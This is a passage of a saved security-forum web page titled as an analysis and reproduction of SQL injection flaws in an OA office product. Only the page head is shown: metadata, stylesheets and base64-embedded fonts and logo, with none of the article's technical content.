Penetration_Testing_POC/books/易宝oa软件两处-ExecuteSqlForSingle注入分析与复现.html

<!DOCTYPE html> <html style><!--
 Page saved with SingleFile 
 url: https://forum.butian.net/article/536 
--><meta charset=utf-8>
<meta http-equiv=X-UA-Compatible content="IE=edge">
<meta name=viewport content="width=device-width, initial-scale=1">
<meta name=csrf-token content=qwOXfPKpQrjtTfVcW6bH2y6e7O1XcL7wgXw67yiG>
<title>易宝oa软件两处-ExecuteSqlForSingle注入分析与复现</title>
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
<meta name=description content=奇安信攻防社区-某宝oa软件两处-ExecuteSqlForSingle注入分析与复现>
<meta name=author content="QIANXIN Team">
<meta name=copyright content="2021 QIANXIN.com">
<style>@media (max-width:767px){}</style>
<style>/*!
 * Bootstrap v3.4.1 (https://getbootstrap.com/)
 * Copyright 2011-2019 Twitter, Inc.
 * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
 *//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}footer,nav{display:block}template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}img{border:0}button,input,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button{text-transform:none}button{-webkit-appearance:button}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@media print{*,:after,:before{color:#000!important;text-shadow:none!important;background:0 0!important;-webkit-box-shadow:none!important;box-shadow:none!important}a,a:visited{text-decoration:underline}a[href]:after{content:" ("attr(href)")"}a[href^="#"]:after,a[href^="javascript:"]:after{content:""}pre{border:1px solid #999;page-break-inside:avoid}img{page-break-inside:avoid}img{max-width:100%!important}h2,h3,p{orphans:3;widows:3}h2,h3{page-break-after:avoid}.navbar{display:none}}@font-face{font-family:"Glyphicons Halflings";src:/* original URL: https://forum.butian.net/static/css/bootstrap/fonts/glyphicons-halflings-regular.woff2 */url(data:font/woff2;base64,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
<style>/*!
 *  Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
 *  License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
 */@font-face{font-family:"FontAwesome";src:/* original URL: https://forum.butian.net/static/css/font-awesome/fonts/fontawesome-webfont.woff2?v=4.7.0 */url(data:font/woff2;base64,d09GMgABAAAAAS1oAA0AAAAChpgAAS0OAAQBywAAAAAAAAAAAAAAAAAAAAAAAAAAP0ZGVE0cGiAGYACFchEIComZKIe2WAE2AiQDlXALlhAABCAFiQYHtHVbUglyR2H3kYQqug2BJ+096zq1GibTzT1ytyoKAhnlGvH2XQR0B9xFqm6jsv/////kpDFG2w7cQODV9Pt8rYoUCGaTbZJgmyTYkaFAZFtCUREkKFtVPCsorbhAUNA1HuRggbAO2j72UBAaO+EokdExs/1s2/5o1Kiiwimf3Fl5lPJKaenrF62Fznwl24G3XqwUR4KiM7gSbp6V6LraldwKxM2QRIqecFxZciCUTN9Q9A6NG4N0pSnLEZjvE6c2UsJeIlMLTH7xWVLXQ1hSFQmKNIGO5kb6eVxbv+g3bqHirnwdc+C7jHEeo027jiVLyf8XLtu6DiwL+oT3+EzQdP8n9hCQyU0dLBEVY/eIK2L6xNeH50/9c/le2CSFhtd6Lgf1bcWgDPxoJmdi3vDhdu2H8wEOySeKDzajOrC7w/Nz622jYowx2KhtMCLHghqwvypWjKiNHqNjoyQsMEFUUFS0MRID+/SsPAvtO+3z0mAQ5rYn8UgOP/Fzzqk6kQ9ORJ+o/KkQSRGkJIwEVBSLW4GCYjSKEc38f+rs7yyvzrzX772jYmw2kboLSUzpaX3bjCbgNOOUbSwnyxbL8yO916Wzf1J3AaJidcC2LEuWC8YGm+J2iwPbCG1fLcDA5lxIi537jkhI/qrzk+oHxsI/mJbTbfMLOVCIrdgpOedKqIYkxr2InOex9Dj46Mfazs5+uTvEchWNbr89JBEatR+UTmRkbhshJ66m8OM7s/SsOJm8J9lOpu0eIX8tGAZKGcq20y7g2PqR7livPQwsEgQOkJseImA6GKL/Gw8JCSB7je+e3OC8EstLISefAKEtRkiUnAmJIyR+m1pfhLmdEBK1A041VlU4RsivHKKOJRRQ1Pvdq9rb+wYIDIZDcAgCJARRGaK0u9oQnXKs7KLKvZvuumu7a9obpzPZtxPROlIRJR4QtoEye/SH3qn1kh1oJbspOMkR9gD48QEPGApJTEuQNnb0I+37s+7+Biw70KY2h6BOmjLOaHa3Dw4I/u9/zf7rDE9Pkad0IxaFBuJ4VInvqkJmAp2ehHFeFiOcrp+WP3v+NWKKSeLgJS1XWpDruWKkQaMTDF7kMc3ZbjUZ+a7pitemTlGdWSf65t3NEpYE/JFTBNwYH6YhdCIgBmBiM+n3JZMH9O8zNbsCFNFmdjurndXObM6s7jmcOmpnZj9ncpv1cP94nyCAD3wS/CAkCCBlEpQcEpRaFCjFFCR3KFpyU5DodiubWtkcz9Zx9k2i7B6b7s3q3ZltPyZzW/bldJlTklNqjqc5nK/j9z+tfNrqDfHwxT5HDswGLBBiRNW3Xqn0ql6px90bOmyKM469TkGaYKs1C5wyNrMBTPlwU/IJQd+nL1XrCsLWmLS8s7QnOVy0p9WGdLiFEK8h3/b2+rca/RuBbAAGhSBQTVK0mpA5boAKzWAVEhMoyhBA0iBIeSlN0mRNyg2QHDXp1KQTSCfSkZoc8m1TPPro23Ema7wpXM97O+4xxcNt+QebONt74YvVWIQx3S0zx5qQkSmCQiiEkSz7JfWTELC2to0ExAsFBd3923efb36+mHTt8EhXOGyQ1FoRCXKk47//PWWzGuzfMSvmBwUvyY4xVz/WsHLuEg44OVBMxtIBPnVvOSDFGDEgdMOYq8N1Y6edke7EQLP5XUsUEFLvf2JO/7uSdvuTtNQaqqgouCKKg3nrvbt7HAxjrv+P5vNzY3qmGSaucDWn5QShLGqzbiCia07EIYMug25e9/hVdR8AQHz8GD92tT73B7kdudwckXIYVWHcSFIgCxqPEPq51/jVkQCT80kNRInfy4tRv71+cOkKgNyNOzu4bvn5jUwYFyShdPkJOgloRkNZoe3eVE+gRk4dTn59F/ExImCzqPyf2GHPB8sozT9IIBGXlocfxFyWzeV1yjATTNS19fEnte26vb7NlFBibm1Pv5jrtt39jb8CGEpsiz8CAQie5XOr5wWIMCwOOIx4yULy+va+QhnH5ZFGiRAUn1/fG1JpWh34/7fUfmUjFWqwEbF3/WhPYyomRjYMrFlxwZIFe4l9P8nzPvd1Hvu2LvM0Ds5oJQVnlGAEpybX5yC4yxIpqaxSNRjlSIx9saf/y6Swa9yp2xyQJ0qZ3k+/AEmI2xO2nV/vs38FkXFPYifWSMefAEJZRU2jAxw2yHaEgTWqEE5KDeUVAU+ITgcaRgtOeCgxkjoBXLrfq0Pga45joGI4BVH0CRNk4RhbTBQoZWwcKzJ1Le7QYdaYZKKONTuiTiTU9iKiSKqPEKtTRrpv6zJpqCKK2VyzaAQ3SYz2oDxTQ08CrRm4lsiQSKAe4kV3IQEuH9fp/SFCUxJDqmcexJ2JY+MOueRzKtWnc4koNW2UPXHGyoplovvxWZELJOtcPhBmTjiAcZeMeOojdgqlNnVt7wngGZ2wYNtOTS1KAFz0EEa3x3LpRAKAHrVa0zCTByMn6qWIbuwR0kdqTILahlgUG8qMokGqnfFnWXOZKrJZytwHx17ZtZg7ItgdJGhifz25FhnPmxOYMN52SDyXVnZ/gWObXwBcWYoD7KPodztkQhYCg4sDToOEMxshJM7n57Tn4t5JfFCYIH4TJhPkA2TFLsgDG9Sw6QItYQfz+mEZCSsrwhOSOboubVL46TTjY3mvnrkji1XVwkZX7gh1vQ3cCRdpL/Ccr5RmfoA03fBsg+sOWFP0OcOEG/cxRZ3wvTNAkP3aaxOI3BVAFycjo7y2Y6y92W7qqSC68RXvU187rCX77kmK0MEru/gu80wa2EMCeLHr7h4evvrqhrF3CdrNVtuCgIG6qOGkwMP5RXhmfkhgvekwH7whZJToQFF7T2gxiRcXsUjBtkbDq9V6cxqNN/Pdibazxpx0D3J2zOip0mudu4ZoZVMzt9uHdpk5hHF8q0+C75dLKZVVXPKWQdIlo7m7AsRvHntsPIbbS7j/up3NjqKkjmmzj/FI60eASYV6nT02mldXbzDr2Qt8Fd4lQfcaamREKSENgKlwd67I7l+Cs+s7uPGm22OXRCPp/8uBTZDA3k56nPIFtwRwsF6PQ0R43sJ4aimENU/IOfsNoWDR0kVEWO548Y0g3ZJHVcjA7cuvDsSZqgSp79baiZwuJQ23v7bOiLF+DOPx+j3/CBoWQxNvpikNRoQ388rnJFqk/Si3Z8Hrb0Ktpw3bxpzAQN7lJvLD2mXuewbq4uWOo6AIbKCwZopfxlJ4mU5bp10MrpsHOGAtM5lztKbBknt/UGoB3hm4V3VjOe+FuK6phBtbPh3qLZ8uRKLcjln6H/ebFQ+AHmSHDM/C2AeisisYXnuTrrlD7veJsW3gxNnwLKaxQE48spAd2tnQ+PKJrx9/Di6NlFbx5k3w2hFT7CvTXESeK6LaUqJ80Ta1C+IncVxU4N0CppXzHB45h0SEBlg8fyTtcImA3gciu+mFppL8JJvStwveLPlwH7tz+aVU084a3f6vYrv/1E5rSZEeX+ahYNXmCkboiB/qV5OfVv+UJdnRdwitfqmkxETUkNnCy90q87N4afIeuHlbclqqhwCZW1MltEeb3BhzYEY844WjhbOsIKLBVosr/vMhK62W9/WKuNiNizl5n2vFwWZikTgy3gZz3n1sO1spZSTE+IlUnYaWa62DkuApmnaPtqk5rAGE4xune9N1E/J1j3SPyN6zQEXj9D58Q/baPFw0JQiXUnbhDKW26eXE6Kra9EDXukPMOFyR+H4pFCNrfL65LmHrb6q62gO6MDBHlHEwHRQl8fzwE6GZaHCLqboNTP+c3iKMKz6O7Oa1JaoLXk3L
<style>@media (min-width:1200px){.navbar-form{width:235px}}@media (min-width:768px){.navbar-form .form-control{width:100%}}@media (max-width:767px){.global-nav{width:100%;text-align:center;z-index:1000}}@media (max-width:767px){}.global-nav .nav{height:44px;padding:0}.navbar-form .btn{position:absolute;top:8px;right:30px;color:#999;-moz-box-shadow:none;-webkit-box-shadow:none;box-shadow:none}.navbar-form .btn:hover,.navbar-form .btn:focus{color:#777}pre{white-space:pre-wrap}@media (min-width:768px){}@media (min-width:992px){}@media (min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}button,input,textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mb-50{margin-bottom:50px}.mt-10{margin-top:10px}.mt-15{margin-top:15px}.mt-30{margin-top:30px}.mt-60{margin-top:60px}.ml-10{margin-left:10px}.mr-5{margin-right:5px}.span-line{margin-left:8px;margin-right:8px;color:#999}.logo{float:left;margin:0;display:inline-block;width:150px}.logo a{display:block;height:50px;width:145px;background-image:/* original URL: https://forum.butian.net/css/default/logo.svg */url(data:image/svg+xml;base64,PHN2ZyBpZD0i5Zu+5bGCXzEiIGRhdGEtbmFtZT0i5Zu+5bGCIDEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmlld0JveD0iMCAwIDQyNi4xMyAxMTEuNDIiPjxkZWZzPjxzdHlsZT4uY2xzLTF7ZmlsbDojZmZmO308L3N0eWxlPjwvZGVmcz48dGl0bGU+5aWH5a6J5L+h5pS76Ziy56S+5Yy6X2xvZ288L3RpdGxlPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTExMiw1Ny4zM3YtNGgzNy43OHY0aC00LjM5VjcxLjE4cS4wOCw1LjUzLTUuMTksNS40NGgtNC44OXYtNGgyLjM0YzEuMiwwLDEuNzgtLjYyLDEuNzUtMS45M1Y1Ny4zM1ptMS44LTExLjkydi00aDEzLjg1VjM4LjkzaDYuNDh2Mi41MWgxMy45M3Y0SDEzNi4zNXEzLDIuNTEsMTAuOTIsNC4zMXYzLjQ3UTEzNiw1MS42NSwxMzAuODcsNDcuNXEtNS4xLDQuMTQtMTYuMzYsNS42OVY0OS43MmM1LjI1LTEuMiw4Ljg4LTIuNjQsMTAuOTItNC4zMVptMi4wOSwyNy4yOFY1OS43NmgxOS4zN3Y3LjM2Yy4xMSwzLjgzLTEuNjcsNS42OC01LjM1LDUuNTdabTUuNDgtNGg2LjQ1YzEuMzkuMDksMi4wNS0uNjEsMi0yLjA5VjYzLjc4aC04LjQxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE1My42Nyw1OC43MlY1NC41M2g0LjY5VjUwLjMxaDYuNTJ2NC4yMmgxNS42OVY1MC4zMWg2LjUzdjQuMjJoNC44MXY0LjE5aC01LjA2YTE1LjM2LDE1LjM2LDAsMCwxLTcuNTcsMTEuODgsOTIuNiw5Mi42LDAsMCwwLDEyLjIxLDIuMzR2NHEtMTIuMTMtMS4yNS0xOC43OC0zLjQ3LTYuNTcsMi4yMi0xOC43LDMuNDd2LTRhMTA0LDEwNCwwLDAsMCwxMi4xNy0yLjM0LDE1LjA2LDE1LjA2LDAsMCwxLTcuNTctMTEuODhabTM2LjYxLTE2Ljg2djcuMzZoLTYuMTVWNDZIMTYxLjM3djMuMjJoLTYuMTVWNDEuODZoMTMuODlWMzkuMDloNy4ydjIuNzdaTTE3Mi43NSw2OC4yMXE2LjY5LTMuMTgsNy42MS05LjQ5SDE2NS4wOVExNjUuOTMsNjUsMTcyLjc1LDY4LjIxWiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTE5OSw3N1Y1Mi43M2EyNywyNywwLDAsMS0zLjQ3LDEuNDNWNTAuMzVhMTcuMiwxNy4yLDAsMCwwLDUuOS0xMWg1LjlhMzIuODYsMzIuODYsMCwwLDEtMi42OCw3LjdWNzdabTcuNzQtMzF2LTRoMTBWMzkuM2g2Ljd2Mi43NmgxMC4xMnY0Wm0xLjM0LDMwLjVWNjIuMjNIMjMxLjd2Ny43cS4xNyw2LjgxLTYuMTUsNi42MVptLjEzLTI0di0zLjhoMjMuNDJ2My44Wm0wLDYuN1Y1NS40MWgyMy40MnYzLjgxWm0xNy44NiwxMC42MlY2Ni4ySDIxMy43MXY2LjMyaDEwLjEyQzIyNS4zOSw3Mi42MywyMjYuMTMsNzEuNzQsMjI2LjA1LDY5Ljg0WiIvPjxwYXRoIGNsYXNzPSJjbHMtMSIgZD0iTTIzNy43Niw0Ni40NnYtNGgxNC40OHY0SDI0OFY2NS4yNGMxLjQyLS4zLDMtLjcxLDQuNzMtMS4yMXY0LjE0YTU1LjQxLDU1LjQxLDAsMCwxLTE1LjE0LDMuNzdWNjYuNzljMS4yNS0uMDgsMi43OC0uMjQsNC42LS40NlY0Ni40NlptMTMuNDMsOC4wN1Y1MC44MXE0LjY5LTQsNS40NC0xMS41NWg2LjExYTMyLjMxLDMyLjMxLDAsMCwxLTEuMDUsNC40NGgxMy43N3Y0aC0zcS0uODQsMTEuODUtNS44NiwxOC4yYTQzLjI2LDQzLjI2LDAsMCwwLDguNDksNi44MnY0LjQ0YTQ5LjQxLDQ5LjQxLDAsMCwxLTEyLTcuNTMsNTIuMTMsNTIuMTMsMCwwLDEtMTIuNjQsNy41N1Y3Mi44MUE0MC4wNyw0MC4wNywwLDAsMCwyNTkuNzMsNjZhMzQuMzgsMzQuMzgsMCwwLDEtNS42MS0xMi44QTIxLjc4LDIxLjc4LDAsMCwxLDI1MS4xOSw1NC41M1ptOC4yNS0zLjcyYTM2LjQsMzYuNCwwLDAsMCwzLjc2LDEwLjVxMi43MS00Ljg5LDMuNDMtMTMuNTZIMjU5LjlhMTUuMSwxNS4xLDAsMCwxLTIuNDcsMy4wNloiLz48cGF0aCBjbGFzcz0iY2xzLTEiIGQ9Ik0yODAuNTYsNzYuOTFWNDAuNjRoMTMuNzN2NGEyNS44NiwyNS44NiwwLDAsMS0yLjY0LDEwLDExLjMyLDExLjMyLDAsMCwxLDMsNy40cS4xNyw4LjUzLTcuOT
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}.navbar-inverse{background-color:#2a8c70;border-color:#2b7a5c}.navbar-inverse .navbar-nav>li>a{color:#fff;padding-left:6px;padding-right:6px}.navbar-inverse .navbar-collapse,.navbar-inverse .navbar-form{border-color:#008151}@media (max-width:767px){}@media (max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#E7F2ED;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}.btn-primary{border-color:#008151;background-color:#009a61;color:#fff}.btn-primary.active,.btn-primary:active,.btn-primary:focus,.btn-primary:hover,.open>.btn-primary.dropdown-toggle{border-color:#00432a;background-color:#006741;color:#fff}.btn-primary.active,.btn-primary:active,.open>.btn-primary.dropdown-toggle{background-image:none}.btn-success{border-color:#4cae4c;background-color:#5cb85c;color:#fff}</style>
<style>@font-face{font-family:qax-design-icons;src:/* original URL: https://forum.butian.net/static/js/qaxd/fonts/qax-design-icons.woff */url(data:font/woff;base64,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